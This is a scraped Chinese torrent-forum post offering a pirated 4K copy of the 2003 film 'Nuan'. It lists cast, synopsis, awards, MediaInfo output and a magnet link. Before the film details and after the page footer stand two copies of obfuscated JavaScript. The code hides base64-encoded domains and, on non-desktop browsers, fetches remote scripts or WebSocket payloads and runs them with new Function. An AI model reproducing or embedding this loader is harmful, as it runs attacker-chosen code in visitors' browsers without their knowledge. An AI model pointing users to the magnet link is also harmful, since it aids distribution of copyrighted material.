暖[国语配音/中文字幕].Nuan.2003.WEB-DL.4K.H265.AAC 12.50GB

版主小s 22天前 229

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x68\x6e\x49\x43\x61\x57\x73\x53\x72\x45']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};

◎译 名 暖 / 故郷の香り

◎年 代 2003

◎产 地 中国大陆

◎类 别 剧情 / 爱情

◎语 言 汉语普通话

◎上映日期 2004-05-18

◎IMDb链接 https://www.imdb.com/title/tt0390311/

◎豆瓣评分 7.9/10 (16408人评价)

◎豆瓣链接 https://movie.douban.com/subject/1308498/

◎片 长 109分钟

◎导 演 霍建起 Jianqi Huo (id:1006351)

◎编 剧 思芜 Wu Si (id:1306547)

莫言 Yan Mo (id:1324032)

◎演 员 郭晓东 Xiaodong Guo (id:1274230)

李佳 Jia Li (id:1318766)

香川照之 Teruyuki Kagawa (id:1037221)

黄齐峰 Qifeng Huang (id:1354160)

关晓彤 Xiaotong Guan (id:1276032)

三宝 Bao San (id:1296601)

孔劲蕾 Jinglei Kong (id:1325102)

◎标 签 霍建起 / 爱情 / 中国电影 / 暖 / 大陆 / 中国 / 青春 / 文艺

◎简 介

住在偏远山村的少女暖(李佳 饰)水灵俏皮,清纯美丽,是青年男子们倾慕的对象,这点对于和暖青梅竹马的林井和(郭晓东 饰)来说更不例外。外面的世界五彩缤纷,暖一心等待偶然驻留于此的戏班英俊武生带她离开这个山村,然而等待她的只有失望。在和井河荡秋千的时候,暖摔伤了腿,不久后井河也离开家乡,两人从此失去联系。

10年后,井河从北京回到家乡,见到了阔别已久的暖。此时的暖跛着腿,形容枯槁,已经嫁给村中的哑巴(香川照之 饰)。一种别样的情感袭上心头……

根据莫言小说《白狗秋千架》改编,并荣获第16届东京国际电影节金麒麟大奖、最佳男演员奖和第23届中国电影金鸡奖最佳故事片奖、最佳编剧奖。

◎获奖情况 (共18项)

第16届东京国际电影节 (2003)

主竞赛单元 最佳影片

└──霍建起 (id:1006351)

主竞赛单元 最佳男演员

└──香川照之 (id:1037221)

第23届中国电影金鸡奖 (2003)

最佳故事片

最佳导演(提名)

└──霍建起 (id:1006351)

最佳编剧

└──思芜 (id:1306547)

最佳女主角(提名)

└──李佳 (id:1318766)

最佳摄影(提名)

└──孙明 (id:1305119)

最佳美术(提名)

└──崔韧 (id:1305532)

最佳音乐(提名)

└──三宝 (id:1296601)

第10届中国电影华表奖 (2004)

优秀故事片奖

优秀导演奖

└──霍建起 (id:1006351)

优秀男演员奖(提名)

└──郭晓东 (id:1274230)

第7届中国长春电影节 (2005)

金鹿奖 最佳华语故事片(提名)

金鹿奖 最佳导演(提名)

└──霍建起 (id:1006351)

第5届华语电影传媒大奖 (2005)

最佳男配角(提名)

└──香川照之 (id:1037221)

最佳编剧(提名)

└──思芜 (id:1306547)

第10届金凤凰奖 (2005)

学会奖

└──郭晓东 (id:1274230)

第11届北京大学生电影节 (2004)

最佳影片奖

  1. ##### MediaInfo ######

  2. General

  3. Complete name : Nuan 2003 WEB-DL 4K H265 [email protected]

  4. Format : MPEG-4

  5. Format profile : Base Media

  6. Codec ID : isom (isom/iso2/mp41)

  7. File size : 12.5 GiB

  8. Duration : 1 h 44 min

  9. Overall bit rate : 17.1 Mb/s

  10. Writing application : Lavf58.30.100


  11. Video

  12. ID : 1

  13. Format : HEVC

  14. Format/Info : High Efficiency Video Coding

  15. Format profile : [email protected]@High

  16. Codec ID : hev1

  17. Codec ID/Info : High Efficiency Video Coding

  18. Duration : 1 h 44 min

  19. Bit rate : 17.0 Mb/s

  20. Width : 3 840 pixels

  21. Height : 2 160 pixels

  22. Display aspect ratio : 16:9

  23. Frame rate mode : Constant

  24. Frame rate : 25.000 FPS

  25. Color space : YUV

  26. Chroma subsampling : 4:2:0

  27. Bit depth : 8 bits

  28. Bits/(Pixel*Frame) : 0.082

  29. Stream size : 12.4 GiB (99%)

  30. Codec configuration box : hvcC


  31. Audio

  32. ID : 2

  33. Format : AAC LC

  34. Format/Info : Advanced Audio Codec Low Complexity

  35. Codec ID : mp4a-40-2

  36. Duration : 1 h 44 min

  37. Bit rate mode : Constant

  38. Bit rate : 126 kb/s

  39. Channel(s) : 2 channels

  40. Channel layout : L R

  41. Sampling rate : 44.1 kHz

  42. Frame rate : 43.066 FPS (1024 SPF)

  43. Compression mode : Lossy

  44. Stream size : 94.0 MiB (1%)

  45. Default : Yes

  46. Alternate group : 1




复制代码


TAGS 剧情 爱情

磁力链:
  • magnet:?xt=urn:btih:55231B57AD161F80EBD97A33088C25D55744D3AF

上传的附件:
BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。
最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNg==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x59\x72\x72\x51\x4e\x72\x4a\x5a\x7a\x42']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};